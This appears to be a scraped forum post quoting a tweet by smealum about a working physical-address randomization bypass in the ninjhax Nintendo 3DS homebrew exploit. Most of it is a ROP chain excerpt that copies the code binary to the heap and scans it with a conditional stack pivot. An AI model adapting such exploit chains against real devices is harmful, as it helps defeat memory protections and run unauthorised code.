Tweet
Smealum got PASLR bypass ROP working
@smealum
FYI the bypass for physical space randomization in ninjhax works:
https://github.com/smealum/ninjhax2....it.s#L225-L256 not sure when I'll have time to do second part
@smealum
FYI the bypass for physical space randomization in ninjhax works:
https://github.com/smealum/ninjhax2....it.s#L225-L256 not sure when I'll have time to do second part
Code:
; copy codebin data to linear heap so CPU can search through it gspwn CN_RANDCODEBIN_COPY_BASE, CN_RANDCODEBIN_BASE, CN_CODEBIN_SIZE sleep 200*1000*1000, 0x00000000 ; initialize loop variables str_val CN_SCANLOOP_CURPTR, CN_RANDCODEBIN_COPY_BASE - CN_SCANLOOP_STRIDE ; for(u32* ptr = CN_RANDCODEBIN_COPY_BASE; *ptr != magic_value; ptr += CN_SCANLOOP_STRIDE/4); scan_loop: ; increment ptr ldr_add_r0 CN_SCANLOOP_CURPTR, CN_SCANLOOP_STRIDE str_r0 CN_SCANLOOP_CURPTR ; compare *ptr to magic_value cmp_derefptr_r0addr CN_SCANLOOP_MAGICVAL, (scan_loop_pivot_after - scan_loop_pivot - 1) ; if conditional call above returns true, we overwrite scan_loop_pivot_offset with 8 (enough to skip real pivot), and 0 otherwise ; that way we exit the loop conditionally .word ROP_CN_POP_R4PC .word 0x00000001 ; r4 (we do + 1 so that 0xFFFFFFFF becomes 0) .word ROP_CN_ADD_R0R4_POP_R4PC .word 0xDEADBABE ; r4 (garbage) str_r0 CN_SECONDARYROP_DST + scan_loop_pivot_offset ; this pivot is initially unconditional but we overwrite the offset using conditional value to skip second pivot when we're done .word ROP_CN_POP_R3_ADD_SPR3_POP_PC scan_loop_pivot_offset: .word 0x00000000 ; this pivot is unconditional always, it just happens to get skipped at the end scan_loop_pivot: jump_sp scan_loop scan_loop_pivot_after:
Comment